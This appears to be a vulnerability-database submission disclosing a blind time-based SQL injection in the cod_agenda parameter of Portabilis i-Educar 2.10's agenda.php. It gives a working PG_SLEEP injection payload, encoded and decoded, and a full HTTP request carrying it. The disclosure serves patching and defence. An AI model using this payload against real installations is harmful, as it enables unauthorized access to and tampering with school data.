| タイトル | Portabilis i-Educar 2.10 SQL Injection |
|---|
| 説明 | SQL Injection (Blind Time-Based) Vulnerability in cod_agenda Parameter on agenda.php Endpoint
Summary
A SQL Injection vulnerability was identified in the /intranet/agenda.php endpoint of the i-educar application, specifically in the cod_agenda parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data.
Details
Vulnerable Endpoint: /intranet/agenda.php
Parameter: cod_agenda
The application fails to properly validate and sanitize user input in the cod_agenda parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays.
PoC
Step by Step:
Access vulnerable endpoint and click on "Novo Compromisso" button to setup a new entry. Type required values in the fields and click on "Salvar". The page will automatically redirect to another Endpoint like: http://localhost:8086/intranet/agenda.php?cod_agenda=2&time=1755283.
image 1: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi1.png
image 2: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi2.png
image 3: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi3.png
Payload:
%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO
Decoded Payload:
' AND 4698=(SELECT 4698 FROM PG_SLEEP(5)) AND 'xiCO'='xiCO
This payload triggers a 5-second delay in the server response, demonstrating that the parameter is vulnerable to blind time-based SQL injection.
Example Request:
GET /intranet/agenda.php?cod_agenda=2%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO HTTP/1.1
Host: localhost:8086
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: i_educar_session=5AfYtvGRiuEgLBVbvksmwiNSnG75l4waXNMo1PEV
Connection: keep-alive
Normal Request:
image 4: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi4.png
SQLi Request:
image 5: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi5.png
Observe the increased server response time, confirming that the injected SQL command was executed.
Impact
Unauthorized data access: Reading sensitive information such as credentials, personal data, or configuration details
Database enumeration: Extracting database schema, tables, and column details
Data manipulation: Adding, modifying, or deleting database records.
Denial of Service (DoS): Using time-based queries to impact system availability.
Potential escalation to RCE: If combined with other vulnerabilities and specific database features.
Finder
Discovered by Karina Gante. |
|---|
| ソース | ⚠️ https://github.com/KarinaGante/KGSec/blob/main/CVEs/i-educar/11.md |
|---|
| ユーザー | karinagante (UID 88113) |
|---|
| 送信 | 2025年08月15日 21:45 (10 月 ago) |
|---|
| モデレーション | 2025年08月27日 09:34 (11 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 321550 [Portabilis i-Educar 迄 2.10 Agenda /intranet/agenda.php cod_agenda SQLインジェクション] |
|---|
| ポイント | 20 |
|---|